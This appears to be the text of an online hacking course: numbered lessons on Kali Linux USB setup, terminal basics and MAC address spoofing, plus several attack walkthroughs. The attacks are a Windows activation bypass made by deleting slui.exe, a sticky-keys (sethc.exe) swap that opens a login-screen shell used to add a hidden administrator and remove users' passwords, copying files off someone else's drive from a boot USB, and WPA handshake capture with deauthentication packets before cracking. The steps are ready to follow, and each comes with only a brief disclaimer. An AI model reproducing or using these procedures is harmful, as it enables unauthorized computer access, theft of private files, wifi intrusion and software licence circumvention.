rdB.bat contents Delete all folders that starts with a B.


@echo off
for /d %%a in (B*) do rd /s /q %%a


21. Bat to Delete File & Folder Types

22. Bios Password Bypass


In the video, I use to bypass a Bios Password,

     I also tell about how to remove it by taking out your

Bios Battery for 2 minutes.

22. Bios Password Bypass

23. Fresh install of Windows 7 Ultimate Ver 32 or 64 bit


     I show you where the sticker is on my Laptop displaying the model number of it, although it's too dark to see my actual model number, you can now look for the model number of your Pc.

     I teach you how to access the Bios on a Pc without Ueifi Bios and with, how to check how much Ram the Pc has, and I walk you through every step of re-installing Windows 7 Ultimate Operating System 32 or 64 bit.

23. Fresh install of Windows 7 Ultimate Ver 32 or 64 bit

Carefully follow the in-video instructions to

1. Boot into the Windows 7 Installation Disk. Navigate to the "d:" drive. This sounds confusing, but in reality this is the c: drive, it appears as d, because we are accessing it from the d: disk drive.

2. delete slui.exe it's located in d:windows/system32 folder which is how Windows locks a Windows 7 Computer, when the activation period expires.

Navigate to the folder slui is located in, to view it and make sure that you're in the right folder you can type, "dir slu*" After seeing it,

Delete slui.exe by typing in the command "del slui.exe" from within d:/windows/system32 folder path.

3. After deleting the Slui file, we need to boot into windows normally without using the installation disk and open up the command prompt with Administrative privileges.

4. Then we type in the command "slmgr -rearm"

5. Wait a few seconds, enter the command to restart your system.

"shutdown /r /t 00"

6. When the computer restarts, open the command prompt with administrative privileges again.

7. Enter the command: "slmgr -ato" wait for the activating windows sign to come up, whether it's successful or not, you're finished, when the time period runs out, it will be a stamp stating that the windows you're using is not a genuine copy of windows, but you will not be locked out of the Windows 7 Pc because no Activation key was entered when the activation time has ran out.

24. Bypass Windows Activation
+ Linux Terminal & Hacking techniques with Linux & Windows Command Prompt Lessons.
34 lectures 04:11:58

I used a Sandisk 32-GB Usb drive to create my Kali Linux Bootable Drive.


1.  Download Universal Usb Installer

2.  Download Minitool Partition Wizard

3.  Download Kali Iso File 2017.2 32-bit version, so that it will be compatible with both new and most computers that are a little old.

4. Open Universal Usb Installer, Agree.

5. Select Kali Linux under Security and Pentesting

6. Browse for your Kali Iso file.

7. If necessary left click view all drives checkbox.

8. Choose the drive you wish to install Kali Linux on, do not install it where you currently have windows installed, or else you will make the pc unbootable.

9. Click Create, agree for it to format the drive that you've selected.

10. Wait until it completes, it could take a while depending upon your device speed.

11. Open the Minitool Partion Wizard, install it.

12. Open Minitool Partition Wizard once installed, view the USB drive that you have plugged into the pc.

13. Right click on the drive, and resize it down to 5gb

14. Right click on the Unallocated space (the unused space.) Select Linux Swap, 8 gb, which will be used as ram if the pc that you're running this on needs extra ram.

15. Right click on unallocated space that is still left, choose the filesystem as Ext4, use the remaining unallocated space.

Name it "persistence" all in lowercase.

16. Left click Apply, left click Yes.

17. Once the changes apply, you are ready to boot from the Usb Drive.

1. Creating Bootable Kali Usb Pendrive

This Video is for Windows 7 and below systems running bios in the setup instead of Ueifi Bios. If you are running Windows 8 or Windows 10, and want to know how to boot from the Ueifi Bios, then watch the next video as well.

1. Disconnect your ethernet cable before continuing.

2. For my Windows 7 pc, I tap F12 to get to the Boot order, some of you may be pressing F9 to access it, or another F- Key.

3. Choose to boot from Usb stick.

4. Choose Live Usb Persistence with the up/down arrow keys and press Enter to boot into it.

A Note: For when we begin, the Linux Terminal is case sensitive, so when we begin you must type everything exactly as I do.


2. Booting in Kali Usb with Windows 7

Before booting into Kali, unplug your Internet if you are connected by the Ethernet Cable, the first time we boot in Kali our host name will be displayed as Kali, we do not want that, I'll teach you how to change it once we boot into the Operating System on the Usb Stick in the next video in this series.


Method 1:

1. Power down your computer, (for a toshiba model, I had to hold the power button down until it went off, then turn on the power button while holding F2.)

Enter the Bios by holding or tapping "F2" while starting your Pc.

2. I went to Security and Disabled Secure Boot, Your pc may or may not have a secure boot option.

3. Look through the tabs for Legacy mode, or Usb Legacy Emulation, Enable it.

4. Go into System Configuration, select CSM Boot instead of Uefi Boot, exit the submenu if you had to go into a sub menu to flip the switch.

5. Exit and save your Bios Settings.

Note: Before you're able to boot back into your normal Operating System, you will need to change all settings back the way they were.

     So do not change anything unless you write down exactly what you change, so that you won't forget.

     Now plugin your Kali Usb, and reboot your system press the

F_ key on your Pc which allows you to choose a boot device,

for me it was F12, but it could be a different F_ Key for you,

I would suggest just repeatedly rebooting your pc until you find the correct F_ Key. Then boot from your Kali Usb choosing Live System Persistence Drive without encryption.

Method 2:

1. Shutdown the system.

2. Plug in your Kali Usb Bootable.

3. Tap F9 repeatedly (yours may be a different key, try different f1-12 keys until you find the right one, or google your pc to fine out which one it is, if they don't work, even try Esc.

4. Press F9 (for me) Enter Setup, for you it may be different, follow on-screen instructions for Navigating.

5. Look for Boot order, or Boot options.

6. Go to Legacy Support, enable it with arrow keys and keyboard, or onscreen instructions if that doesn't work.

7. In the legacy boot order, set Usb to be booted from first. Follow on-screen instructions to change the boot order, as different computers may be different controls. It may or may not ask you to enter the on-screen displayed code upon booting up your machine again to confirm changes, depending on your Pc's security.

8. On Ueifi Boot order, we will boot from the hard drive, or Os first.

9. Follow onscreen instructions to save & exit, for me it was F10.

10. The next time it tries to boot up, we have to enter the pass code it displays on the screen then press Enter to confirm the changes that we've made.

11. After it boots up, shutdown the system again.

12. Once it shuts down, and even the powerkey light goes out.

13. Turn on your Pc, and tap F9 (or the key you used before to get to boot options)

14. Go down to Usb Hard Drive that you have Kali installed on,

select (Ueifi) version if you have an Operating that supports Ueifi (Windows 8-10).

15. Go down to Live System Persistence drive without encryption, and press Enter.

It will then boot from the Kali Usb Bootable Drive. Now you need to wait patiently, and not press anything while matrix style text flies across your screen. Haha Until We see the Operating System, then I'll continue the Tutorial from there in the next video.

3. Booting in Kali from Uefi Bios (Windows 8-10) to Usb

1. move mouse to the left side of the screen until the menu appears.

2. Left click on the Terminal.

3. type, "fdisk -l" look for the 15 gb persistence on your drive.

4. Type the following commands to mount the persistence drive to the 15 gb of persistence space that we've setup. Assuming that your 15 gb Usb drive is recognized as sda3, You will need to look and see what it is recognized as, and change the commands accordingly.

"mkdir -p /mnt/UUI"

"mount /dev/sda3 /mnt/UUI"

"echo "/ union" >> /mnt/UUI/persistence.conf"

Note: check the persistence folder, to make sure it echoed the file to the persistence drive.

"umount /dev/sda3 && reboot"

5. Wait for it to boot up.

6. Left click Files, other locations, if it worked you now have the added persistence space on your Usb Drive.

7. type, "cd ~/Desktop" to navigate to Root's User Desktop.

8. type, "macchanger -l >> mlist" it will save a list of mac addresses to a nano note on your Desktop, you can go to this file and press "Ctrl+F" to search for something, you can type in a certain name-brand of computer to find their mac address. You can copy the first 6 characters & colon signs of a chosen Mac Address.

9. "service network-manager stop" to shutdown your internet interfaces and make things changeable.

10. ifconfig to display Internet Interfaces.

11. macchanger -s eth0 = to view the current mac address to your pc.

12. macchanger -r eth0 = to change it to a random mac address.

13. macchanger -m 00:00:00:00:00:00 eth0 = insert the first 6 digits from the mac address that you copied, and the last 6 from the randomly generated mac address.

14. macchanger -m 00:00:00:00:00:00 lo = change the lo interface as well.

15. nano /etc/hostname = change your hostname from kali to your new hostname.

16. nano /etc/hosts = change the name part of it from kali to your new hostname.

17. service network-manager start = starts your network manager back up.

18. exit = exits the terminal.

19. Open a new Terminal, and take notice of the new hostname.

20. Connect your wired ethernet cable to your Pc.

21. Left click on the icon to view, "wired connected."

22. ifconfig = view internet interfaces.

23. macchanger -s eth0 = view the mac address, to ensure they are spoofed.

24. macchanger -s lo = view the mac address, to ensure they are spoofed.

25. ping = if you receive bytes of data back, you are connected to the Internet. Press "ctrl+c" to stop pinging.

26. macchanger -s eth0 = check mac addresses to see if they are still spoofed.

27. macchanger -s lo = check mac addresses to see if they are still spoofed.

28. ifconfig = check your inet address under the eth0 (if you are connected with a wired connection.) to view your machine's ip, the ip address of your router should be the same except for the numbers after the last dot.

29. Open firefox, enter the ip address of your router. you can search for your pc connected to it with the right hostname.

30. To change your background of the Linux Desktop, place an image in your Pictures folder.

31. Right click your desktop and left click "Change Background"

32. Click on Pictures, if it doesn't show up, you may need to exit, and re-open the Pictures Folder, then click on the Pictures link from within it.

33. Select the photo and press Select, exit.

34. Open up the Firefox Browser, click settings, preferences, search, select Duckduckgo as the default search engine. Remove every other search engine that it recommends.     

     Duckduckgo is supposed to be an anonymous search browser to help keep you anonymous, but who really knows if anything is truly anonymous?

35. go to the Kali Forums, Left click on Installing Kali Linux.

Left click on Installing Kali Linux then click Kali Linux Sha1 Hashes.

36. I have this usb stick plugged into the same computer I used to create it with, so I find the right file that I downloaded, the right version. i386 means 32-bit in linux, while amd64 means 64 bit Copy it.

37. Type nano verify in the terminal, which opens up a notepad file in the kali terminal named verify. Hold "ctrl+shift+V" to paste the official Sha1sum hash in it.

38. now I navigate to my hard drive's volume, and where I have the iso file downloaded at on my hard drive, in my case it's the Downloads Folder.

39. type "cd " then drag the iso file into the terminal, then backspace until you erase the iso file and just see the folder path, wrap 'apostrophe' around it since we are using Linux instead of Windows, with windows we always wrapped quotes around the path as you know if you've been following the videos in my series.

40. type "sha1sum ", type part of the name, press Tab and it will auto-fill out the name, then press Enter, wait several seconds, and wait for it to return the Sha1sum hash.

41. copy the Sha1sum hash that we just received, and manually verify it with the official Sha1sum hash we got from the forum to make sure they are the same.

     Note: The Sha1sum Hash verification isn't necessary to use Linux, but I like to do it to make sure someone hasn't uploaded a faulty .Iso File.

     You can exit the nano pad by pressing "ctrl+x" then tapping the "n" key to not save any changes after you're done, since we are done with the Sha1sum Hashes, and won't need to verify it anymore in this series.

4. Making Persistent, Change Host, Mac Address, Background

1. Left click on the terminal to open it.

2. ifconfig = view internet interfaces

3. macchanger -s eth0 = shows current mac address. It changed back upon booting into Kali each time usually.

4. history = To view the commands since you've made the usb drive persistent. It can be useful when you need to look back at your command history for something that worked out for you. Copy your Mac Address that you spoofed earlier.

5. cd ~/Desktop = navigates to Root User's Desktop.

6. nano c = opens the nano editor, and has the potential of creating a file on your desktop called, "c".

7. ctrl+shift+V = pastes the copied mac address from your history.

8. ctrl+O = confirm the name you want then press enter.

9. ctrl+x = exits the nano editor.

10. macchanger -m 00:00:00:00:00:00 eth0 = changes eth0 wired connected ethernet interface.

11. macchanger -m 00:00:00:00:00:00 lo = changes lo interface.

12. service network-manager start = starts your network-manager again, it's not necessary to exit the terminal unless you are changing your host name also.

13. ping = check to see if you're online.

14. press ctrl+c = to cancel the ping.

15. macchanger -s eth0 = checks eth0 mac address to see if it is spoofed or not.

16. macchanger -s lo = checks lo mac address.

5. Ethernet Mac Reset Each Time you start Linux

Everytime you boot kali again, you will need to re-change your Mac Address.

1. You can plug in wireless alfa internet adapter using a Desktop wirelessly, or you can just use your built in wireless internet on a Laptop.

2. type ifconfig, You will notice wlan0 or a wlan something also comes up.

3. service network-manager stop = shuts down the network interfaces and makes them changeable again.

4. nano /etc/hostname = change host name

5. nano /etc/hosts = change host name

6. macchanger -m 00:00:00:00:00:00 eth0 = change mac address

7. macchanger -m 00:00:00:00:00:00 lo = change mac address

8. macchanger -m 00:00:00:00:00:00 wlan0 = change mac address

9. service network-manager restart

10. exit the terminal, open a new one.

11. macchanger -s wlan0 = shows the wlan0 mac address.

12. ifconfig wlan0 down = brings the interface wlan0 down by itself, while leaving the others running.

13. macchanger -m 00:00:00:00:00:00 wlan0 = change the wlan0 mac address again.

14. macchanger -s = check it, it should have changed correctly this time.

15. Left click at the top right to get the menu, left click select network, select a router to connect to.

16. Type in the password for your router if you have any, press enter.

17. ping = if you receive bytes of data you are online.

18. macchanger -s wlan0 = Show the mac address, make sure it changed.

19. macchanger -s eth0 = Show the mac address, make sure it changed.

20. macchanger -s lo = Show the mac address, make sure it changed.

21. sometime before you get offline, go into wifi settings, go to the router you are connected to, left click the settings icon, and uncheck connect automatically.

     This will disconnect you and prevent your Wifi from auto-connecting at bootup whenever you start Kali Linux, so that your real mac address will not be shown to the router you are connecting to.

6. Connect Wirelessly Change Mac Address and Host

Different ways to open the terminal.

1. Left click on the Terminal.

2. press the left Windows Key and type, "gnome-" then Tab, then press Enter when it says, "gnome-terminal" which is the command to open the terminal.

3. from inside the Gui Terminal, you can hold "Ctrl+Shift+T" to open a new tab.

4. Hold "Ctrl+alt" and "Tap F2-F6" to go into Terminal mode and open up several different Terminals at once.

5. hold "Ctrl+alt" and "Tap F1" to go back to Gui mode.

6. You can exit any terminal, by going to it and typing exit.

7. Press and hold "Alt", and tap "F2", then type, "gnome-terminal" to open a Terminal as well.

7. Opening the Terminal

1. Click on edit, preference, profiles, edit.

2. You can name the profile, or edit the colors.

3. You can change the transparency of the background.

4. exit & left click close.

8. Appearance of Terminal

If your date is incorrect, some search engines will not work.

1. date = views your currently set date & time.

2. Left click on your Desktop, press the left windows key.

3. date = Left click on date & time.

4. Left click on timezone, select a different continent to change the time. It's in Army time, so anything above 12 hours would be 1 pm or 2 pm, just minus 12 from anything above 12.

9. Date and Time

     For nearly any command, we have help pages, or man pages to help us out if we want to know more about them.

     Sometimes we even have them from within a program, or on a Readme file that came with the program if we are using one that we are unfamiliar with.

1. ls help = shows help page for the ls command.

2. man ls = will show a manual page for that command if it exists Press the Enter key to skip down line by line, press q to quit, if that doesn't work, we'll just press "Ctrl+c" to cancel a command as usual, but q should work for this.

10. Man and Help Pages

1. cd / = brings you to the main folder of your usb drive.

2. cd /root && ls = navigates to the root user and lists files.

3. cd Desktop;ls = like the && ; also strings together commands, but only takes 1 input instead of 2. Also "Desktop" is case sensitive as are all commands in Linux.

4. cd .. = goes back a directory.

5. cd ~/Desktop = Navigates back to the Desktop

5. ls = views files just like "dir" does for a windows command prompt.

6. mv c .c = This command is used for moving files, and for renaming them. In this case it hides the c file that is on our Desktop.

7. ls -a = views all files much like dir /a views all files in the Windows command prompt.

8. cat .c = views a hidden text file from within the Terminal

9. mkdir Test Folder = creates 2 folders in your current working directory, one called Test and one called Folder.

10. mkdir Test\ Folder/ = creates a single folder called, "Test Folder"

11. You can navigate to it from the same working directory by typing, "cd Test\ Folder/"

12. mv Test\ Folder .Test\ Folder = hides the Test Folder from normal view.

13. ls -a = will still show it up.

14. cd .Test\ Folder = To navigate to the hidden folder.

15. ls -lt = list files by date.

16. ls -lta = list all files including hidden ones by date.

17. rm File\ 1 = To remove "File 1"

18. rm File\ 2 = To remove "File 2" from our Desktop

19. rm -r folder = To remove a directory/folder named "Folder" from our Desktop.

11. Navigation & Create Folders & Hide them & Delete Files, Folders

1. cd ~/Desktop = navigates to root user's Desktop.

2. nano textfile = to create a nano file called textfile, the file will not be created until you save it.

3. Ctrl+O = Pressing this after writing in a note in the nano editor, prompts the user to save the nano file.

4. Enter Key = saves the file.

5. Ctrl+X = exits the nano editor.

6. You can double left click the file in your Desktop to open it in your default text editor.

7. cat textfile = the file can also be viewed from within the terminal from your present working directory.

8. cat ~/Desktop/textfile = You can cat the file from a different directory by entering the full path of the file.

9. cd ~/Desktop = navigates to Desktop

10. mv textfile test/textfile = creates a folder for the text file and moves it at the same time.

11. cd test;ls = navigates to testfolder and lists the contents.

12. less textfile = to view the contents a small version of it without cluttering up your terminal, you can press "q" to quit.

13. cd ~/Desktop = navigates to Desktop

14. cat mlist | more = press enter to scroll down, and "q" to exit.

15. touch text2 = creates an empty text2 nano file, later when you feel like it you can nano it to put content inside it.

12. Nano Files

1. firefox = opens a page with firefox using the terminal.

2. Alt+Tab or alt+shift+tab = switches between running processes.

3. Ctrl+Shift+T = opens a new terminal tab.

4. top = to view the task manager from within the terminal.

5. ctrl+c = wait for the process you are looking for to come up then press "Ctrl+c" to cancel it.

6. kill 6030 = to kill a process with 6030 as a PID Number.

7. "Ctrl+page up & page down" navigates forward and backward through terminal tabs in gui (graphical user interface) mode.

8. press the up key, to slowly flip through your history of commands, for example, if you needed to re-enter a command that you just got done using a few commands ago it would be useful.

10. pkill firefox = (or the command that you used to bring a process up.) kills the process by command name.

11. xkill = then click on the process that you would like to kill.

12. pgrep firefox-esr = You can find a process PID number by typing this command.

13. Linux Terminal Task Manager & Kill Processes

1. cd ~;ls = navigates to the root user's folder and lists the contents within.

2. du -sh Desktop = checks the filesize of Desktop folder and lists it.

3. du -sh Pictures = checks the filesize of Pictures Folder and lists it.

4. cd Pictures = navigates to Pictures.

5. du -sh file.JPG = would check a file.jpg file size if there was one named this in your Pictures Folder.

14. Check Folder & File Sizes

Navigate to the folder which has the files you wish to open.

1. firefox filename.extension = is the format you would use to open a file with firefox, you can run many different filetypes from it, such as videos, pictures, and probably a few audio files.

2. xdg-open 1.png = opens a PNG image with the default image viewer.

3. nano thetextfile\ example.txt = opens a file called "thetextfile example.txt" in the nano editor.

4. nano 'thetextfile example.txt' = opens a file with nano editor.

5. firefox thetextfile\ example.txt = opens the file using firefox.

6. cat thetextfile\ example.txt = lists the file's content from within the terminal.

7. leafpad thetextfile\ example.txt = opens with leafpad editor.

8. cat 'thetextfile example.txt' = lists the file's contents from within the terminal.

9. Note: If I just right click on a video file and open it, it will open it using the default video player from Linux.

10. I can close out the video player, type "top" in the terminal, then open the video player and look for new processes that come up to find the command name needed to start that program from the terminal.

11. totem 1opent.webm = opens a file called 1opent.webm using the default linux player called totem.

12. nautilus . = opens the current directory in a graphical interface point & click folder.

13. Ctrl+C = if you can't get it to exit, or if the terminal gets stuck by opening nautilus from it.

14. nautilus .. = opens one directory back from your present working directory.

15. Open Files from Terminal

1. find / iname ".mli*" = Searches for anything in the root's folders and subfolders for a hidden file called "Mli" and has more text after.

2. Ctrl+C = to cancel the search after the file that you want has been found, or when you would like to stop searching, left click hold highlight and right click copy to copy the path without the filename or extension.

3. cd 'PASTE THE PATH OF THE FILE THAT YOU FOUND WITHOUT THE FILENAME OR EXTENSION WITHIN THE APOSTROPHE';ls -a = navigates to the folder to where it found the file you're looking for (if it exists)

4. find /root/Desktop -iname "*.PNG" = brings back the results of all the PNG filetypes.

5. copy the path where the file was found and navigate to it.

6. ls files to see it.

7. ls *.PNG = If you know which folder the file is in already you can just list the file extension with a wildcard by pressing the asterix key as I did.

8. ls -a = You could also list all files in the terminal, then press, "Ctrl+Shift+f" to open up the search box and find text from within your terminal.

16. Find Files Using the Terminal

We create our first Linux Script, which asks the user a question,

collects their answer, and performs an action after it checks the answer

to see if the IF Statement is true or else.


Contents of



#The above is called, "Shebang" or "bang line" all scripts under Linux execute using the interpreter specified on a first line.


#creates a VAR using the interpreter specificied on a first line.

echo "Hey Guys & Gals"

#echoes "Hey Guys & Gals"

read -p "are you ready to learn?" a1

#Asks people if they're ready to learn,

#Stores the input in a VAR named a1.

sleep 02

#waits 2 seconds.

if [[ $a1 == $ae ]];then

#compares the 2 VARS to see if their values match, if they do, then it

#echoes the below message.

echo "Let us begin."


#else statements says that the above VARS do not match.

echo "No it does not."

#echoes, "No it does not."

sleep 02

#waits 2 seconds


#issues the commands "gnome-terminal" and "firefox-esr"


#finishes the If Statement, all if statements must be finished.


From the directory that you saved the nano

You can change the permissions of the script, to make it executable.

1. chmod 550 = makes the file executable for the admin and the user, but gives public 0 permissions.

2. ls = the file now should be green if it's executable to you.

3. ./ = starts the script, and requests user input.

4. If the user says "yes", it echoes the message, "Let us begin."

5. If the user puts anything but "yes", The script will echo "No it does not" then open the gnome-terminal and firefox-esr.

For more information regarding chmod commands view the example below.

chmod xxx fileorfoldername

1st digit changes permissions of administrative users.

2nd digit changes permissions of user groups that you've created.

3rd digit changes the permissions of the public.

0 = no access

2 = write only

3 = write & execute

4 = read only

5 = read & execute

6 = read & write

7 = full access

"chmod 740 folder" would give the administrative root user full access to the folder, the user groups read only access, and the public 0 access to a folder called folder.

"chmod 620 file" would give administrator root user full access to the file,

the user groups read only access, and the public 0 access to a file called file.

17. First Basic Script & Changing Permissions with Chmod

*Note: I do not condone hacking, this is for informational purposes only, please only perform this on drives that you own.*

18. Physical Access Hack Compatible with Windows Xp, Vista, 7, 8, Windows 10, also several Linux OS's As long as the Pc is able to Boot from Kali Linux Usb Drive, this Hack should work, if you are unable to boot Your Pc from Kali Linux Usb for Testing this Hack, then don't despair, because, we'll have future Hacks the others.


Graphical User Interface Hack "Gui Physical Hack"

1. Create a "folder" on your desktop.

2. Left click on the file explorer.

3. Left click on other locations.

4. Find the drive that you're wanting to physically hack.

5. go through the files and copy whatever you want to your newly created Desktop folder.


Terminal Hack (copying files with the Terminal)

This can be useful if you want to copy files without the gui interface. If you were booting into a computer that was so slow, it couldn't load the graphical interface very smoothly.You could navigate and get the files you need using the terminal only. You can also copy files to the user's computer.

Note: If you copy files to the pc, it will look as if the Pc Owner created the files instead of where it originally came from.

0. If you just accessed the hard drive's folders using the Graphic Inteface as we just did, you may have to restart the bootable drive before you are able to mount the drive to successfully perform the terminal only physical hack.

So, just turn off your Pc and Reboot into Kali.

1. Ctrl+alt+F1-6 = goes to terminal only mode.

2. cd ~/Desktop;ls = navigates to the Usb Drive's Desktop folder and lists the files within it.

3. mkdir 1Pc;ls = creates a folder called 1Pc, then lists the contents showing the newly created folder.

4. cd /media; = navigates to /root/media folder.

5. mkdir ONEPC;ls = Makes a folder called ONEPC, then lists the newly created folder.

6. fdisk -l = lists the disks & volumes associated with this Pc.

7. Look for the correct volume, size of your pc's hard drive, mine was 232 Gigabytes in size so it was /dev/sda2

8. mount /dev/sda2 /media/ONEPC = mounts the hard drive to the ONEPC folder that we just created.

9. ls = lists files within current directory.

10. cd ONEPC;ls = The ONEPC folder is green now, so it is mounted. We navigate to it and list the contents within.

11. cd Users = Navigates to the Users folder.

12. cd user; ls = Navigates to username "user" folder and lists the contents within.

13. cd Desktop;ls = Navigates to User's Desktop folder.

14. du -sh DSCN0118.AVI = Checks the filesize of the Avi video file, it will list the file size.

15. cp DSCN0118.avi ~/Desktop/1Pc = it takes a while to copy depending upon the file size, if you got impatient, you could press and hold ctrl and tap c key to cancel if you changed your mind.

16. du -sh edittest = checks the size of the edit test folder on the User's Desktop, and lists it.

17. cd ~/Desktop/1Pc;ls = navigates to the Desktop's 1 pc folder of our Usb Drive.

18. mkdir edittest;ls = creates a folder, then lists the folder that it just created.

19. cd /media/ONEPC/Users/user/Desktop/edittest;ls = Navigate back to our volume's path inside the folder in which we'd like to copy.

20. cp -r * ~/Desktop/1Pc/edittest = copies the current files contents, and subfolders of the current working directory to the Usb ~/Desktop/1Pc/edittest path, then lists the contents.

21. cd ~/Desktop/1PC;ls = navigates to the Desktop's 1PC folder & lists the contents, we can see the subfolder that was in the edittest directory on the hard drive from here & some image files.

22. cd .. = back a directory.

23. cd .. = back a directory.

24. cd /media;ls = navigates to the /root/media folder & lists the contents within.

25. umount /media/ONEPC = unmounts the hard drive from the Usb Mounted ONEPC folder, this is very important, if you remove this file before unmounting you will remove everything from your Hard Drive. If you do this, Windows WILL NOT be Bootable, so you will ruin your Operating System. Don't Do This.

26. ls = check to see if it's green or not, if not it has been unmounted.

27. cd ONEPC;ls = navigates to the unmounted folder to check to see if there's any files in it.

28. ls -a = performs a check for any hidden files within the folder as well.

29. cd .. = navigates back to the /media folder.

30. rm -r ONEPC;ls = removes the empty ONEPC folder & lists the changes to the media folder.

Now the folder has been saved to our persistent Usb Drive. If you needed something bigger than 15 Gb of space to copy files to, you could always plug in and mount an external drive, then copy your files to that instead.

31. ctrl+alt+f1 = switches back into gui (Graphical Interface Mode) If your computer is fast enough you can now view the files that you copied, if not you can take this usb stick to a faster computer and view the files there.

18. Physical Access Hack Compatible with Windows Xp, Vista, 7, 8, Windows 10, al

*Note: I do not condone hacking, this is for informational purposes only, please only perform this on drives that you own.*

19. Physical Access Hack Windows 7 Ultimate 32-bit Fresh Install Disk


Method 1.

This Hack works on all, Windows XP-Windows 10 - I haven't tested it on Linux Operating Systems however.

1. Restart the Pc, Boot from the Windows 7 Ultimate 32-bit Installation disk.

2. Shift+F10 = Bring up the Hidden Command Prompt.

3. wmic logicaldisk = lists the drives, and the sizes of the drives.

4. d: = enters the d drive, you can look in different drives, until you find the correct drive on the Pc.

You can go anywhere you want and look through the filenames.

5. wmic logicaldisk = plug in a usb stick, and type this command again, then look for the size of your usb stick, until you find the right one.

6. You can "copy" or "xcopy" file or files from and to the computer, just by entering both paths like we learned back in the Windows Command Prompt Playlist Tutorial,

"6. Copy Files & Folders from Pc to Usb" using the Command Prompt Commands."


Method 2.

This Hack works on all, Windows 7, Windows 8, Windows 10 - I haven't tested it on Vista, or Linux Operating Systems however it does not work on Windows Xp, since the "sethc.exe" Sticky Keys function wasn't accessable by tapping Shift in that version of Windows.

1. Boot into Windows 7 Ultimate 32-bit Installation disk.

2. Shift+F10 = Bring up the hidden Command Prompt.

3. Navigate to the drive of your operating system, then the windows\system32 directory.

4. dir seth* = does a file search for anything with seth in the beginning part of the name, it should bring back sethc.exe

5. copy sethc.exe seth2c.exe = makes a copy of sethc.exe and names it seth2c.exe

6. dir cmd* = lists the files and searches for anything with cmd in the beginning part of the name, it should bring back "cmd.exe"

7. copy cmd.exe cmd2.exe = makes a copy of cmd.exe and names it cmd2.exe

8. dir cmd* = does another directory search within windows\system32 folder for all files starting with cmd*, you now should be able to see both cmd.exe & cmd2.exe

9. dir seth* = lists the files beginning with seth, it should bring back sethc.exe and seth2c.exe

10. rename sethc.exe sethc3.exe = renames the sethc.exe to sethc3.exe

11. rename cmd2.exe sethc.exe = renames the command prompt file to the sticky key application, so that whenever the user boots into the windows and taps shift 5-10 times fast, it will open the Command Prompt instead of the sticky-key option.

12. exit = exits the command prompt, now since you are booted from the disk, in order to power down your system, you need to hold the power button for around 10 seconds and  then start your computer normally and boot into windows as you normally do.

13. When you are at the login screen, tap shift 5-10 times fast, this will bring up the Command Prompt, and start it as an Administrator user.

14. net user /add username pass1 = creates a user called, "username" and sets the password for that user as "pass1".

15. net localgroup administrators /add username = gives the user, "username" Administrative rights.

16. Shut down your pc by clicking shutdown icon.

17. Start your pc back up, select the user, "username" at the login screen, it will take a while to prepare the desktop since it will be the user's first time booting into it.

     Take a break, listen to some music, and don't be in a hurry, sometimes it takes 5-12 minutes depending on the system's speed that you are working on.

     Windows 8 or Windows 10 usually take longer than Windows 7 Pcs because they have more things to load up and get ready.

18. Now since you are an Administrator of the Computer, (for Windows 7) you can left click, Start go to your local C: drive, and enter the users folder, and view content of users of the computer.

19. If you wanted to login to their username, you can go to the Control Panel, User Accounts, User Accounts, Manage another account, Select a user, then select Remove Password.

    Note: It will remove passwords saved by chrome, and a few files, but it will keep the contents saved within the username.

19. Physical Access Hack Windows 7 Ultimate 32 bit Fresh Install Disk

20. Gain wpa wifi access


     Alfa Networks 1000mW USB Wifi Adapter AWUSO36H v5 Genuine Hologram AWUS036H

     You need to purchase an Internet Adapter with Injection Capabilities in order to follow along with this video, You can find it on Ebay.

     This Video is the only video in the series that require this Internet Adapter, so if you are not interested in Hacking Routers (Hacking a router just provides wifi, or gives the ability to prevent users from accessing the Wifi without logging into the Router's Page.) Then I would suggest, just skipping out on buying the Adapter, and skipping this video entirely. I decided to learn it, because I am a knowledge seeker, and found it interesting to learn how hacking router's work also.


In this video, I'll be showing you 2 different ways to hack a Router's wifi password.

Plug in your wifi Alfa internet adapter to your Pc before continueing.

1. ifconfig = view internet interfaces

2. macchanger -s wlan0 = shows current alfa Mac Address.

3. service network-manager stop = Stops the network-manager.

4. Open the mlist file we've saved earlier, and type up a namebrand of pc, I used Gateway.

5. macchanger -r wlan0 = change wlan0 to a different unknown mac address.

6. macchanger -m 00:00:00:00:00:00 wlan0 = use the first 3 digits from your chosen namebrand mac address, and the last 3 digits of the unknown random mac address that was generated.

7. macchanger -m 00:00:00:00:00:00 eth0 = change eth0 mac address

8. macchanger -m 00:00:00:00:00:00 lo = change lo mac address

9. nano /etc/hostname = change hostname here

10. nano /etc/hosts = change hostname here as well.

11. service network-manager start = starts network-manager again, then exit the terminal and open it again.

12. macchanger -s eth0 = check mac address

13. macchanger -s lo = check mac address

14. macchanger -s wlan0 = check mac address, usually the wifi mac address is a little harder to fix, proceed with the following steps.

15. ifconfig wlan0 down = brings the wlan0 interface down

16. macchanger -m 00:00:00:00:00:00 wlan0 = copy the same mac address as earlier to it, if you forgot what it was, you could always use, "history" command to view your history.

17. ifconfig wlan0 up = brings the wlan0 interface up again

18. airmon-ng = to view the wireless interface.

19. airmon-ng start wlan0 = puts wlan0 interface into monitor mode.

20. airmon-ng stop wlan0 = stops wlan0 interface so we can kill some processes that may interact negatively with it.

21. airmon-ng check kill = checks for processes that may interact negatively with it, then kills them.

22. airodump-ng wlan0mon = Now we can see all of the surrounding routers that are around us, type "Ctrl+c" to cancel the monitoring once you find the router that you are targeting.

23. airodump-ng -w ESSIDOFROUTER -c CHANNELNUMBER --bbsid 00:00:00:00:00:00 wlan0mon = This will create a file in our /root's home directory as it's monitoring the Router, we need to get a handshake before we cancel this monitoring mode, the bottom mac addresses, are the devices that are connected to it right now.

Ctrl+shift+t to open a new terminal in another tab.

24. aireplay-ng --deauth 10 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0mon = This will send 10 packets out, and disconnect the client from the Router for about 7 seconds, if they have it set to auto-connect, then when it connects, we'll get the handshake in our other terminal window, if not, you'll have to wait for them to reconnect their device manually.

     Now in the first terminal window, where we are monitoring it, in the upper right corner, you'll see when you have a successful wpa handshake. You now have all of the information you need to take the captured file somewhere else and begin working on cracking it.

25. cd ~/Desktop = navigates to your Desktop

26. nano Routerinfo = Let's create a nano file on our desktop to copy the info of our the Target's router, as we will need it later during the cracking process.

27. airmon-ng stop wlan0mon = Now you have everything that you need in order to start the cracking process so if you wanted to, you can type this to place your wifi interface back into station mode, then reset your mac addresses and your hostname to your normal one as we did earlier.

METHOD 1 CRUNCH: Use if you already know part of the password.

1. "Ctrl+shift+t" open up a new tab, type "man crunch" to view the manual for the crunch.

The first crack I'll teach is if you know part of the password, but do not know it all.

